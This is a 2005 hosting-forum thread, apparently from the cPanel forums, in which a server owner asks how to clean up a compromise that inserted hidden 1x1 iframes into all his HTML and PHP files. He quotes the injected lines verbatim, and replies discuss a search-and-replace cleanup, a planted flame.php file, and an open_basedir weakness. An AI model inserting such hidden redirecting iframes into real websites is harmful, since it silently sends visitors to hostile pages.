The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Server get hacked

Discussion in 'General Discussion' started by vishwas, Nov 27, 2005.

  1. vishwas

    vishwas Well-Known Member

    Joined:
    Feb 9, 2004
    Messages:
    61
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Front of PC
    Hello,

    My server get hacked , what hacker do he runs some script & it puts these two lines in all .html and *.php file and all sites redirects to that domain. mainly it puts these two lines in all index file and its pain to remove these two line with editing each file :S may be its virus !!

    Anyone have solution for this !!!!!

    <iframe src='http://domain.com/images/index.html' width=1 height=1></iframe>
    <iframe src='http://domain.com/images/index.html' width=1 height=1></iframe>
     
    #1 vishwas, Nov 27, 2005
    Last edited: Nov 28, 2005
  2. jaymc

    jaymc Well-Known Member

    Joined:
    Jan 5, 2005
    Messages:
    100
    Likes Received:
    0
    Trophy Points:
    16
    First thing to do is locate the mal CODE that is doing this

    second is to write a simple php script or something to do a search and replace on all .htm files

    str_replace()

    will be of use

    Also, you say 'hacked'... I would call this some one having an account on your server, and takin advantage of the OPEN_BASE security issue you have yet to address, thus giving him access to every file and folder on your server...

    He could actually do a lot more than change HTM files, so think your self as lucky

    :)
     
    #2 jaymc, Dec 1, 2005
    Last edited: Dec 1, 2005
  3. JohnodACD

    JohnodACD Active Member

    Joined:
    Oct 21, 2005
    Messages:
    38
    Likes Received:
    0
    Trophy Points:
    6
    I had this in my server as well it was a file called flame.php that was loaded in a users images folder. when this path was called it redirected all the sites to a forign server(meaning not mine).

    When i suspended this site it then redirected all my sites to teh suspend page untill i rebooted teh server.

    I also noticed that if you change the password for this domain or account on teh server they can still get access to it so you want to suspend the site if you can find teh files and then delete the files then change teh passowrd.
     
  4. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    Just in case you are overwhelmed with the cleaning up task, may I suggest you hire a sys admin to round up, secure and protect your server.
     
  5. jackie46

    jackie46 BANNED

    Joined:
    Jul 25, 2005
    Messages:
    537
    Likes Received:
    0
    Trophy Points:
    0
    Should he hire you?
     
  6. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    He can if you wishes to. Any has a good reputation on these forums for helping people in such situations, as have others.
     
Loading...

Share This Page